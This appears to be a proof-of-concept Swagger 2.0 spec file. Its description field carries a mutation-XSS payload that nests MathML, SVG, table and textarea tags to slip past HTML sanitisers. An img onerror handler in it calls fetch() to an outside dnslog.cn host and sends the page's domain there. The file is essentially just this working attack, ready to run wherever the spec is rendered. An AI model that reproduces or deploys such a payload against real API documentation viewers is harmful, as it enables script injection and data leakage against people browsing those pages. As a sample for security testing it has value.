swagger: "2.0"
info:
  description: |
    <math>
      <mtext>
        <table>
          <mglyph>
            <svg>
              <mtext>
                <textarea>
                  <a title="</textarea>
                  <img src=x onerror="fetch('https://obsy4c.dnslog.cn/'+document.domain)">
                ">
